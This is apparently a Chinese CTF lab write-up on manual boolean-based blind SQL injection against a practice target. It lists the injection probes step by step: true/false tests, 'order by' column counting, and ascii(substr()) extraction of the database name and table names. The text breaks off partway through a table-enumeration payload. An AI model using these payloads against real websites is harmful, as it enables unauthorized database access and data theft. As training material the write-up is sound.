一、判断是否存在sql注入
二、判断字段数
三、利用substr函数与ascii函数
将需要判断的内容进行ascii转码
然后对照ascii表,得到内容信息
解题详细:手工盲注与sqlmap
(方法一)手工盲注
1.打开靶场http://xxx:43922/
点击登录框下面的通知
进入http://xxx:43922/new_list.php?id=1
2.判断此处存在sql注入
构造and 1=1正常
构造and 1=2不正常
3.判断字段数
构造order by 4正常
构造order by 5不正常
4.判断database()的长度
构造and length(database())>1正常
构造and length(database())>9正常
构造and length(database())>10不正常
构造and length(database())=10正常
5.截取database()的字符,一个个进行ascii编码,然后对照ascii表得出database()
构造and (ascii(substr(database(),1,1))>1)正常
构造and (ascii(substr(database(),1,1))=115)正常
构造and (ascii(substr(database(),2,1))=116)正常
......
结果为:115;116;111;114;109;103;114;111;117;112
对照ascii表:stormgroup为数据库名
6.截取database()中第一个table的字符,一个个进行ascii编码,然后对照ascii表得出table
第一个表:member
构造and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>1)正常
构造and (ascii(substr((select table_name from information_schema.tabl